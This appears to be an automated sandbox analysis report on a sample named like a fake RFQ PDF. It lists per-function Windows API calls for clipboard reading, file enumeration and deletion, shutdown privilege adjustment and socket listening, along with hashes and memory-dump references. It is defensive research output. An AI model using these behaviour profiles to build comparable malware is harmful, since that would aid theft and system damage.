                                                                                                                • OpenClipboard.USER32(00ADCC08), ref: 00ABEB29
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00ABEB37
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00ABEB43
                                                                                                                • CloseClipboard.USER32 ref: 00ABEB4F
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEB87
                                                                                                                • CloseClipboard.USER32 ref: 00ABEB91
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABEBBC
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00ABEBC9
                                                                                                                • GetClipboardData.USER32(00000001), ref: 00ABEBD1
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEBE2
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABEC22
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00ABEC38
                                                                                                                • GetClipboardData.USER32(0000000F), ref: 00ABEC44
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00ABEC55
                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00ABEC77
                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ABEC94
                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ABECD2
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ABECF3
                                                                                                                • CountClipboardFormats.USER32 ref: 00ABED14
                                                                                                                • CloseClipboard.USER32 ref: 00ABED59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 420908878-0
                                                                                                                • Opcode ID: b0940445971ae44cf0df53daeb14adea82bb933ef88a16b51d042f0459339829
                                                                                                                • Instruction ID: 08c16064e0601565bfe912a27dbf31e818561c924875765c0c05d3353e104747
                                                                                                                • Opcode Fuzzy Hash: b0940445971ae44cf0df53daeb14adea82bb933ef88a16b51d042f0459339829
                                                                                                                • Instruction Fuzzy Hash: C061D239204202AFD300EF64D988FEA77E8EF84714F54851EF456972A2CB71DD46CBA2
                                                                                                                Function 00AB698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AB69BE
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB6A12
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AB6A4E
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AB6A75
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AB6AB2
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AB6ADF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                • Opcode ID: ac66d9ac5d3c21fa5dabb2af81c0b60922159af3135a94fd7181bdfdb1e62923
                                                                                                                • Instruction ID: 8c8897f2add1ece9d6276e960e9bfe11184d16924d89e3663775ecc7c28c6a27
                                                                                                                • Opcode Fuzzy Hash: ac66d9ac5d3c21fa5dabb2af81c0b60922159af3135a94fd7181bdfdb1e62923
                                                                                                                • Instruction Fuzzy Hash: F3D13076508340AEC714EBA4C981EAFB7ECBF88704F44491DF589D7192EB74DA48CB62
                                                                                                                Function 00AB9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AB9663
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00AB96A1
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00AB96BB
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB96D3
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB96DE
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AB96FA
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB974A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00B06B7C), ref: 00AB9768
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AB9772
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB977F
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB978F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                • Opcode ID: 12062807de94aedb2dca0ccefe8e9b6bbbccb736942fd238a7a5bc630f75f3ce
                                                                                                                • Instruction ID: 4d06b163390f5db33b0ac8e53428ebdadb60942f3bd1af4abfd910efeeadeefb
                                                                                                                • Opcode Fuzzy Hash: 12062807de94aedb2dca0ccefe8e9b6bbbccb736942fd238a7a5bc630f75f3ce
                                                                                                                • Instruction Fuzzy Hash: 4331B07254161A6ADB14EFF4DC49ADF7BFCAF09320F104156EA05E21A1EB30D981CA50
                                                                                                                Function 00AB979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00AB97BE
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AB9819
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB9824
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00AB9840
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB9890
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00B06B7C), ref: 00AB98AE
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AB98B8
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB98C5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AB98D5
                                                                                                                  • Part of subcall function 00AADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AADB00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                • Opcode ID: 9d215380d5396f04526d6f0a2eee530db80d3be6b0129c11180fadd7647f17c5
                                                                                                                • Instruction ID: 65abc1a5a96c122bebb788cd067cba4ffb4614ea6c0fd75aa8e02000ed4bbfbc
                                                                                                                • Opcode Fuzzy Hash: 9d215380d5396f04526d6f0a2eee530db80d3be6b0129c11180fadd7647f17c5
                                                                                                                • Instruction Fuzzy Hash: 3431D47250161A7EDF14EFF4DC49ADF77BCAF06320F108156EA15A21E1DB31D985CA60
                                                                                                                Function 00AB8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00AB8257
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AB8267
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AB8273
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB8310
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8324
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8356
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AB838C
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB8395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                • Opcode ID: aa7b9c1efd8bfe93daccb2aaef7561bb6fc8e7d4f1f865cc72ba8b3eef3302b7
                                                                                                                • Instruction ID: 0c3376311cd9d1aeec968f45dffa6d40329526707a103eef4c03947a1433c1b2
                                                                                                                • Opcode Fuzzy Hash: aa7b9c1efd8bfe93daccb2aaef7561bb6fc8e7d4f1f865cc72ba8b3eef3302b7
                                                                                                                • Instruction Fuzzy Hash: C46158765043459FCB10EF64C9409AEB3ECFF89324F04891AF99A87252EB35E945CB92
                                                                                                                Function 00AAD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AAD122
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00AAD1DD
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AAD1F0
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AAD20D
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AAD237
                                                                                                                  • Part of subcall function 00AAD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00AAD21C,?,?), ref: 00AAD2B2
                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 00AAD253
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD264
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                • Opcode ID: 218406e92de0c2905f7f3748ccb3d49206cbb1b87fac7c3e36857f9d678eb5ba
                                                                                                                • Instruction ID: 670638f2de9206c0aec71e36af90d8862c797bd4374cb69ae05a000738de8b67
                                                                                                                • Opcode Fuzzy Hash: 218406e92de0c2905f7f3748ccb3d49206cbb1b87fac7c3e36857f9d678eb5ba
                                                                                                                • Instruction Fuzzy Hash: 4B617E35C0110DAFCF05EBE0DA92AEEB7B5AF56300F204169E44277192EB316F09DB61
                                                                                                                Function 00ABED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: 9e1179ce429fac78220416d84dac4fa08efdd03b36d54ce5359778c2f485b3d2
                                                                                                                • Instruction ID: c29098b4001bbcdf6c99199c9bad335443eaa4af8c2723666cae0cc8e843effd
                                                                                                                • Opcode Fuzzy Hash: 9e1179ce429fac78220416d84dac4fa08efdd03b36d54ce5359778c2f485b3d2
                                                                                                                • Instruction Fuzzy Hash: CD41CE35205212AFE720DF55D888B99BBE9FF44328F54C09AE41A8B662C775EC42CB90
                                                                                                                Function 00AAE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                  • Part of subcall function 00AA16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                  • Part of subcall function 00AA16C3: GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00AAE932
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-3163812486
                                                                                                                • Opcode ID: f501ae0f8ead36b8074fcb53e2c8278293258252ce60f8cca13eba0e13142aae
                                                                                                                • Instruction ID: e712d0897b61772687fa025f0737e3d201a829425cb5f303b4ab0bbf71234b15
                                                                                                                • Opcode Fuzzy Hash: f501ae0f8ead36b8074fcb53e2c8278293258252ce60f8cca13eba0e13142aae
                                                                                                                • Instruction Fuzzy Hash: 6B01D672610311ABEB64A7B49C86BFBF36CAB16750F154526F813E31D1E7A05C4481A4
                                                                                                                Function 00AC1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AC1276
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1283
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AC12BA
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC12C5
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC12F4
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00AC1303
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC130D
                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AC133C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 540024437-0
                                                                                                                • Opcode ID: 6333533cb826a674812c5ba53dfc9a994706417c8b8a80b06aafbb6fcac6c754
                                                                                                                • Instruction ID: 859f66c62224327bb709819f6a64b9cdc3da35792acd9769f39ecc1563c12fdc
                                                                                                                • Opcode Fuzzy Hash: 6333533cb826a674812c5ba53dfc9a994706417c8b8a80b06aafbb6fcac6c754
                                                                                                                • Instruction Fuzzy Hash: 7C418D35A002419FD710DF64C588F69BBE5AF86328F19819DE8568F293C771EC82CBE1
                                                                                                                Function 00A7B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A7B9D4
                                                                                                                • _free.LIBCMT ref: 00A7B9F8
                                                                                                                • _free.LIBCMT ref: 00A7BB7F
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AE3700), ref: 00A7BB91
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A7BC09
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B11270,000000FF,?,0000003F,00000000,?), ref: 00A7BC36
                                                                                                                • _free.LIBCMT ref: 00A7BD4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 314583886-0
                                                                                                                • Opcode ID: fd12832701ff15ea74f2131723df088cef3cd7ccb341125d5a28b56bb6cd2e9f
                                                                                                                • Instruction ID: 92579330918f97bb8d4df186429a6321c625d51cca880bea593c2c1794557e8a
                                                                                                                • Opcode Fuzzy Hash: fd12832701ff15ea74f2131723df088cef3cd7ccb341125d5a28b56bb6cd2e9f
                                                                                                                • Instruction Fuzzy Hash: E5C12AB19142059FCB21EF788D41BAA7BB8EF45350F14C59AE998DB251EB308E41C7B0
                                                                                                                Function 00AAD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AAD420
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AAD470
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AAD481
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD498
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00AAD4A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                • Opcode ID: e9175133b9fe1b9276c1be60e8445131ecccf40e86856caa1158ca2c29cc19ec
                                                                                                                • Instruction ID: c37ed89a87404ffcd6481c2ba8119c13184a66ef8469f514193125f48267c43e
                                                                                                                • Opcode Fuzzy Hash: e9175133b9fe1b9276c1be60e8445131ecccf40e86856caa1158ca2c29cc19ec
                                                                                                                • Instruction Fuzzy Hash: 9C3182750093459FC300EF64C9558AFB7E8BED6314F844A1EF4D653191EB30AA09D763
                                                                                                                Function 00A7E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
